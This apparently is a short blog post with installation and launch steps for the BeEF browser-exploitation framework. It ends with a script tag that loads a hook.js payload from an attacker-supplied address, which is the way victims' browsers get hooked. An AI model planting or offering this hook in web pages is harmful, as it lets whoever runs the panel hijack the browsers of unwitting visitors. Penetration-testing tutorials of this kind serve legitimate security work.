[Installation:]
# cd /usr/local/sbin
# git clone https://github.com/beefproject/beef
# cd beef
# ./install
After the installation is done, change the default password by:
# vi ./config.yaml
Modify 'passwd: "beef"' to your own password before saving the file and exiting.
# ./update-geoipdb
[Execution:]
# /usr/local/sbin/beef/beef
Then browse "http://127.0.0.1:3000/ui/panel" to manage BeEF. Bear in mind that the Hook URL is "http://YOUR_IP:3000/hook.js". The hook could be used in such a snippet as shown below:
<script src="http://YOUR_IP:3000/hook.js"></script>
No comments:
Post a Comment